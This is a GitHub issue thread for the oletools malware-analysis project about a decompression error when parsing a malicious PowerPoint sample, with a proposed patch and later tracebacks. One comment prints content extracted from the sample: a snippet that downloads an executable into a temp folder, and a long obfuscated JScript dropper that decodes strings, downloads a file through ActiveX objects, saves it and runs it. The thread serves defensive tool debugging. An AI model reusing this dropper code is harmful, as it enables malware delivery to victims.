search

decalage2 / oletools

oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.
http://www.decalage.info/python/oletools
Other
2.91k stars 562 forks source link

ppt_parser: zlib.error: Error -3 while decompressing data: incorrect header check #608

Open decalage2 opened 4 years ago

decalage2 commented 4 years ago

I get this exception when running olevba 0.56dev8 on Python 3.8.3 and Python 2.7.18 (Windows 10), with this sample: 381ad5eabe618fc31a87e0b410a49b4d627b09d244053d99caa74e4d683401b7.ppt https://www.virustotal.com/gui/file/381ad5eabe618fc31a87e0b410a49b4d627b09d244053d99caa74e4d683401b7/detection

jloehel commented 4 years ago

Can you please share the sample on polyswarm.network.

decalage2 commented 4 years ago

OK, it's here: https://polyswarm.network/scan/results/file/381ad5eabe618fc31a87e0b410a49b4d627b09d244053d99caa74e4d683401b7

jloehel commented 4 years ago

The stream does not have a zlib header. It works with this patch:

diff --git a/oletools/ppt_parser.py b/oletools/ppt_parser.py
index 93b75a4..e7a91c6 100644
--- a/oletools/ppt_parser.py
+++ b/oletools/ppt_parser.py
@@ -1613,7 +1613,7 @@ class PptParser(object):
 def iterative_decompress(stream, size, chunk_size=4096):
     """ decompress data from stream chunk-wise """

-    decompressor = zlib.decompressobj()
+    decompressor = zlib.decompressobj(-zlib.MAX_WBITS)
     n_read = 0
     decomp = b''
     return_err = None

The decompressed object contains in example: Loading putty from https://the.earth.li

FileURL = "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"\r\n$FileName = "%temp%\\Setup.exe"\r\n$FileSize = InetGetSize($FileURL)\r\n\r\nInetGet($FileURL,$FileName,0,1)

Javascript Payload

function qRpM() {
    \
    n\ tswitch(true) {
        \
        n\ tcase true: \n\ t\ tvar auerQdS = true;\
        n\ t\ tbreak;\
        n\ tcase "KAcTbZ": \n\ t\ tvar zjBXBY = true;\
        n\ t\ tif(zjBXBY === "1") {
            \
            n\ t\ t\ tvar tCXvxYP = "pGFivN";\
            n\ t\ t
        }\
        n\ t\ tbreak;\
        n\ tcase "XtV": \n\ t\ tvar KdzeFx = false;\
        n\ t\ tif(KdzeFx == "1") {
            \
            n\ t\ t\ tvar UfrrFv = 7571;\
            n\ t\ t\ tvar LVkUq = 9736;\
            n\ t\ t\ tvar kBeK = 5782;\
            n\ t\ t\ tUfrrFv = LVkUq * kBeK;\
            n\ t\ t\ tvar MDtMqJv = 332;\
            n\ t\ t\ tUfrrFv = LVkUq + MDtMqJv;\
            n\ t\ t\ tvar azQltgj = 7585;\
            n\ t\ t\ tazQltgj = kBeK * UfrrFv;\
            n\ t\ t
        }\
        n\ t\ tbreak;\
        n\ t
    };\
    n
}\
nfunction tuIENPO(uPjNUdYs) {
        \
        n\ tvar zt = \'FQaxKJ\';\n\tvar PjW = \'\';\n\tvar uxTntf = (3200, 7514, 1148, 5898, 9996, 6969, 2571, 9076, 8667, 6929, 6085, 0);\n\tvar kxRsukom = zt.length;\n\tvar IViwKX = (3200, 7514, 1148, 5898, 9996, 6969, 2571, 9076, 8667, 6929, 6085, 0);\n\tvar RxrZmBWV = "";\n\twhile (IViwKX < uPjNUdYs.length - (2082, 6178, 5186, 1077, 6819, 4831, 4581, 5877, 8027, 2094, 2)) {\n\t\tRxrZmBWV = uPjNUdYs.charAt(IViwKX) + uPjNUdYs.charAt(IViwKX + (3925, 2090, 3988, 6491, 1166, 2655, 3420, 7246, 773, 1)) + uPjNUdYs.charAt(IViwKX + (2082, 6178, 5186, 1077, 6819, 4831, 4581, 5877, 8027, 2094, 2));\n\t\tif (uPjNUdYs.charAt(IViwKX) == (3200, 7514, 1148, 5898, 9996, 6969, 2571, 9076, 8667, 6929, 6085, 0)) {\n\t\t\tRxrZmBWV = uPjNUdYs.charAt(IViwKX + (3925, 2090, 3988, 6491, 1166, 2655, 3420, 7246, 773, 1)) + uPjNUdYs.charAt(IViwKX + (2));\n\t\t}\n\t\tif ((uPjNUdYs.charAt(IViwKX) == (3200, 7514, 1148, 5898, 9996, 6969, 2571, 9076, 8667, 6929, 6085, 0)) && (uPjNUdYs.charAt(IViwKX + (3925, 2090, 3988, 6491, 1166, 2655, 3420, 7246, 773, 1)) == (3200, 7514, 1148, 5898, 9996, 6969, 2571, 9076, 8667, 6929, 6085, 0))) {\n\t\t\tRxrZmBWV = uPjNUdYs.charAt(IViwKX + (2082, 6178, 5186, 1077, 6819, 4831, 4581, 5877, 8027, 2094, 2));\n\t\t}\n\t\tuxTntf = parseInt(RxrZmBWV);\n\t\tuxTntf = uxTntf ^ (zt.charCodeAt(IViwKX / (6212, 5041, 2081, 6439, 9374, 3) % kxRsukom));\n\t\tPjW += String.fromCharCode(uxTntf);\n\t\tIViwKX += (3);\n\t}\n\treturn PjW;\n}\nfunction FWpMQj(PgVUdv, vRyryV) {\n\tswitch (PgVUdv) {\n\tcase 3942:\n\t\tvar bdTo = "owirTd";\n\t\tif (bdTo == "0") {\n\t\t\tvar AGhO = 9038;\n\t\t\tvar GbZAw = 7639;\n\t\t\tvar lryOvaQ = 5193;\n\t\t\tAGhO = GbZAw - lryOvaQ;\n\t\t\tvar yQA = 5031;\n\t\t\tyQA = 8757 + 2375;\n\t\t}\n\t\tbreak;\n\tcase true:\n\t\tvar yJuZi = 1984;\n\t\tbreak;\n\tcase false:\n\t\tvar UDIYq = 85992;\n\t\tif (UDIYq == true) {\n\t\t\tvar OEMl = 5181;\n\t\t\tOEMl = 5967 / 7425;\n\t\t\tvar LvmVl = 2979;\n\t\t\tLvmVl = 6173 * 1515;\n\t\t\tOEMl = 4183 + 6287;\n\t\t}\n\t\tbreak;\n\t};\n\tswitch (true) {\n\tcase "0":\n\t\tvar fWryi = 38020;\n\t\tif (fWryi == false) {\n\t\t\tvar OWk = false;\n\t\t}\n\t\tbreak;\n\tcase 9319:\n\t\tif (PgVUdv === "0") {\n\t\t\tvar nOByS = 8179;\n\t\t\tvar uMDSk = 542;\n\t\t\tvar eLR = 5279;\n\t\t\tnOByS = uMDSk / eLR;\n\t\t\tvar aaUu = 7609;\n\t\t\tvar guvpQyk = 9881;\n\t\t\taaUu = nOByS - guvpQyk;\n\t\t\tnOByS = 4232 - 7846;\n\t\t\tvar nXBke = 9108;\n\t\t\tguvpQyk = uMDSk + nXBke;\n\t\t}\n\t\tbreak;\n\tcase "0":\n\t\tvar OUN = "GSNr";\n\t\tbreak;\n\tcase "1":\n\t\tvar jStFHGC = "UANDml";\n\t\tbreak;\n\tcase 4790:\n\t\tvar fsSMlG = 7420;\n\t\tbreak;\n\t};\n}\nfunction DjfwCKd() {\n\tvar RdRIlI = 77017;\n\tif (RdRIlI == "1") {\n\t\tvar svSvcV = 4062;\n\t\tvar NDlWv = 394;\n\t\tvar Xmv = 4178;\n\t\tsvSvcV = NDlWv + Xmv;\n\t\tvar MADmXm = 5650;\n\t\tvar szw = 6402;\n\t\tMADmXm = szw - Xmv;\n\t\tszw = 8534 + 869;\n\t}\n\tswitch ("0") {\n\tcase true:\n\t\tvar bom = "KouRipW";\n\t\tif (bom == 10802) {\n\t\t\tvar jgN = 6345;\n\t\t\tvar xSA = 5618;\n\t\t\tvar XhdL = 1590;\n\t\t\tjgN = xSA - XhdL;\n\t\t\tvar XLwSpya = 8451;\n\t\t\tvar fCAv = 4805;\n\t\t\tjgN = XLwSpya + fCAv;\n\t\t\tvar AlQKsEr = 3250;\n\t\t\tvar cNusl = 4086;\n\t\t\tAlQKsEr = cNusl * XLwSpya;\n\t\t}\n\t\tbreak;\n\tcase true:\n\t\tvar SrULR = false;\n\t\tbreak;\n\t};\n\tswitch ("1") {\n\tcase false:\n\t\tvar fEDF = false;\n\t\tbreak;\n\tcase "1":\n\t\tvar ZlvIvS = true;\n\t\tif (ZlvIvS === "0") {\n\t\t\tvar sxHs = 13310;\n\t\t}\n\t\tbreak;\n\t};\n\tvar aVeDuDm = 42845;\n\tif (aVeDuDm === 17447) {\n\t\tvar WsMyxBl = "YttWoAg";\n\t}\n\tswitch (17640) {\n\tcase 12971:\n\t\tvar rKxXkvV = 11967;\n\t\tbreak;\n\tcase "0":\n\t\tvar Rkh = false;\n\t\tbreak;\n\tcase "cBXoK":\n\t\tvar jmY = 75703;\n\t\tif (jmY === false) {\n\t\t\tvar qvbaTY = 18499;\n\t\t}\n\t\tbreak;\n\tcase "ZsspNt":\n\t\tvar ZcUzheL = 10816;\n\t\tbreak;\n\t};\n\tvar swvOB = false;\n\tif (swvOB === false) {\n\t\tvar uYU = 13078;\n\t}\n\treturn true;\n}\nfunction rBVlSX() {\n\tvar QlxFKoE = tuIENPO("046037021008113101105096081076101120117105079073124126104096081076100035045063014015100121127102087086115120115");\n\tvar ieVmQbj = new ActiveXObject(tuIENPO("017002002010034058050127050016046038042"));\n\tvar aBQqp = new ActiveXObject(tuIENPO("021050019017059062047063006086013035042052050001056062035060046026033047037037"));\n\tvar GWB = aBQqp[tuIENPO("001052021043059047037056000020013037042053004010")]((4769, 3932, 2)) + \'\\\\\' + aBQqp[tuIENPO("001052021044046039054031000021046")]();\n\tvar RNa = new ActiveXObject(tuIENPO("011002057053007120104009044052003030018001"));\n\tRNa[tuIENPO("041033004022")](tuIENPO("001020053"), QlxFKoE, false);\n\tRNa[tuIENPO("053052015028")]();\n\tif (RNa[tuIENPO("021037000012062057")] == (3870, 6431, 9088, 200)) {\n\t\tvar zRaWwLl = new ActiveXObject(tuIENPO("007021046060009100021037019029042039"));\n\t\tzRaWwLl[tuIENPO("009033004022")]();\n\t\tzRaWwLl[tuIENPO("018040017029")] = (8205, 3749, 4311, 3553, 1912, 7447, 1);\n\t\tzRaWwLl[tuIENPO("017035008012046")](RNa[tuIENPO("020052018008036036053052035023047051")]);\n\t\tzRaWwLl[tuIENPO("022062018017063035041063")] = (3830, 3734, 5845, 9193, 5245, 4226, 6738, 5407, 2129, 0);\n\t\tzRaWwLl[tuIENPO("021048023029031037000056013029")](GWB);\n\t\tzRaWwLl[tuIENPO("005061014011046")]();\n\t\tieVmQbj[tuIENPO("052036015")](tuIENPO("037060005086046050035113078027107") + GWB, (3830, 3734, 5845, 9193, 5245, 4226, 6738, 5407, 2129, 0));\n\t}\n}\nfunction rQvLVPt(jkI, uukOO, KpktRv, kHIaE) {\n\tswitch ("KAVL") {\n\tcase "lgiRZjR":\n\t\tvar hIjtiZ = "QGle";\n\t\tvar QOhnPSs = true;\n\t\tif (QOhnPSs === false) {\n\t\t\tvar nwmSQhW = 1043;\n\t\t\tnwmSQhW = 888 + 4098;\n\t\t\tvar NVdV = 1756;\n\t\t\tNVdV = 6958 / 3722;\n\t\t\tvar ZLdnsXW = 292;\n\t\t\tvar pkDxgI = 7334;\n\t\t\tvar EPONJBp = 2716;\n\t\t\tZLdnsXW = pkDxgI - EPONJBp;\n\t\t\tvar NBEpVkm = 9100;\n\t\t\tNBEpVkm = 38 + 9194;\n\t\t\tvar qioneqd = 3490;\n\t\t\tqioneqd = 7024 - 7149;\n\t\t}\n\t\tvar ZTD = 24318;\n\t\tif (ZTD === "0") {\n\t\t\tvar JbSa = 7215;\n\t\t\tJbSa = 5748 / 6275;\n\t\t\tvar zIbyehq = 1048;\n\t\t\tzIbyehq = 9332 / 1410;\n\t\t\tvar nZwkGY = 3897;\n\t\t\tvar gSauw = 2640;\n\t\t\tnZwkGY = nZwkGY * gSauw;\n\t\t\tvar qJOmo = 8135;\n\t\t\tnZwkGY = qJOmo * gSauw;\n\t\t}\n\t\tvar Cetd = "MHDtGJp";\n\t\tif (Cetd == 4845) {\n\t\t\tvar UCsba = "DuyM";\n\t\t\tvar uhgc = true;\n\n\t\t}\n\t\tbreak;\n\tcase "0":\n\t\tvar TLqL = 32546;\n\t\tif (TLqL == "zWmMA") {\n\t\t\tvar Ikj = 4992;\n\t\t\tvar aeqb = 7528;\n\t\t\tvar PLBGodK = 6426;\n\t\t\tIkj = aeqb - PLBGodK;\n\t\t\tvar trA = 2770;\n\t\t\tvar lnKFE = 2155;\n\t\t\tPLBGodK = trA * lnKFE;\n\t\t\tlnKFE = PLBGodK / Ikj;\n\t\t\tPLBGodK = aeqb + trA;\n\t\t\tlnKFE = aeqb + PLBGodK;\n\t\t}\n\t\tbreak;\n\t};\n\tvar fVKbUu = true;\n\tvar TJISrv = false;\n\treturn 1;\n}\nfunction vQYlUW(RxNT, WwSv, HHj, YDsgKv) {\n\tvar bPkfAZS = true;\n\tvar wLQqcFj = "ulhSsrY";\n\tswitch (3537) {\n\tcase "OFQfHwoG":\n\t\tvar LPraj = false;\n\t\tbreak;\n\tcase "nbYZQq":\n\t\tvar JTgHNB = 34286;\n\t\tbreak;\n\t};\n\n\tvar YttvSP = "zCCTOL";\n\tswitch (YDsgKv) {\n\tcase true:\n\t\tvar SJiSCd = 83654;\n\t\tbreak;\n\tcase "0":\n\t\tif (WwSv == false) {\n\t\t\tvar yhkm = 5932;\n\t\t\tvar dZS = 7182;\n\t\t\tyhkm = yhkm * dZS;\n\t\t\tvar YNxAHlm = 4574;\n\t\t\tYNxAHlm = 6856 / 8940;\n\t\t\tYNxAHlm = 1366 * 7535;\n\t\t\tvar tQNgQj = 2299;\n\t\t\tyhkm = YNxAHlm - tQNgQj;\n\t\t}\n\t\tbreak;\n\tcase "1":\n\t\tif (YDsgKv === "0") {\n\t\t\tvar dbHvTI = true;\n\t\t}\n\t\tbreak;\n\tcase "OciygkfC":\n\t\tvar DxKfEw = "RaUqP";\n\t\tbreak;\n\t};\n\tvar hVsRJW = false;\n}\nfunction aIVZ(QCinR, erDNkJ) {\n\tvar acN = true;\n\tif (acN == false) {\n\t\tvar vLtUF = 7683;\n\t\tvar ALSN = 1606;\n\t\tvar uHoMqyO = 5263;\n\t\tvLtUF = ALSN + uHoMqyO;\n\t\tvar vhRny = 9517;\n\t\tALSN = vLtUF + vhRny;\n\t\tvar LCoHDo = 101;\n\t\tLCoHDo = 9096 / 6830;\n\t\tvar yUuNBXb = 5479;\n\t\tyUuNBXb = 4003 * 9521;\n\t\tvar tfxsIkb = 2041;\n\t\tLCoHDo = uHoMqyO - tfxsIkb;\n\t}\n\tswitch (QCinR) {\n\tcase "0":\n\t\tvar Nbz = "UNNUUI";\n\t\tbreak;\n\tcase "NgEWXIJ":\n\t\tvar YDYDigV = 37959;\n\t\tbreak;\n\t};\n\treturn 1;\n}\nif (aIVZ(15910, "0") == true) {\n\tif (DjfwCKd("1") == true) {\n\t\tif (rQvLVPt("0", 9347, false, "1") == true) {\n\t\t\trBVlSX();\n\t\t} else {\n\t\t\tFWpMQj(false, "1");\n\t\t}\n\t}\n} else {\n\tvQYlUW("MzqpH", "1", false, true);\n}\nqRpM("0");
ghanashyams commented 4 years ago

I could see issue in pptparser for 0.55 also, here the scan result. Sample 01625d84291891312a07b0d7fe38a617920e05d36d7d074f7e523b9362106a5f is available in VT.

python olevba.py 01625d84291891312a07b0d7fe38a617920e05d36d7d074f7e523b9362106a5f olevba 0.55.1 on Python 3.7.4 - http://decalage.info/python/oletools ERROR Failed to open 01625d84291891312a07b0d7fe38a617920e05d36d7d074f7e523b9362106a5f -- probably not supported! Traceback (most recent call last): File "olevba.py", line 4138, in process_file relaxed=options.relaxed) File "olevba.py", line 3732, in init super(VBA_Parser_CLI, self).init(*args, **kwargs) File "olevba.py", line 2697, in init self.open_ppt() File "olevba.py", line 3002, in open_ppt container='PptParser')) File "olevba.py", line 2745, in init raise FileOpenError(msg) FileOpenError: Failed to open file None is not a supported file type, cannot extract VBA Macros.

jloehel commented 4 years ago

I could see issue in pptparser for 0.55 also, here the scan result. Sample 01625d84291891312a07b0d7fe38a617920e05d36d7d074f7e523b9362106a5f is available in VT.

python olevba.py 01625d84291891312a07b0d7fe38a617920e05d36d7d074f7e523b9362106a5f olevba 0.55.1 on Python 3.7.4 - http://decalage.info/python/oletools ERROR Failed to open 01625d84291891312a07b0d7fe38a617920e05d36d7d074f7e523b9362106a5f -- probably not supported! Traceback (most recent call last): File "olevba.py", line 4138, in process_file relaxed=options.relaxed) File "olevba.py", line 3732, in init super(VBA_Parser_CLI, self).init(*args, kwargs) File "olevba.py", line 2697, in init self.open_ppt() File "olevba.py", line 3002, in open_ppt container='PptParser')) File "olevba.py", line 2745, in init** raise FileOpenError(msg) FileOpenError: Failed to open file None is not a supported file type, cannot extract VBA Macros.

I am not sure about this traceback. I saw the same issue if the parsing of the ole_subfiles fails. https://github.com/decalage2/oletools/blob/a7a9ff7e0a6955e893bd1ff72efdea265ab417db/oletools/olevba.py#L3019 There the filename is None. Maybe it was not possible to parse a record in the ole_subfiles. Can you please upload the sample to https://polyswarm.network/.

ghanashyams commented 4 years ago

Uploaded the sample https://polyswarm.network/scan/results/file/01625d84291891312a07b0d7fe38a617920e05d36d7d074f7e523b9362106a5f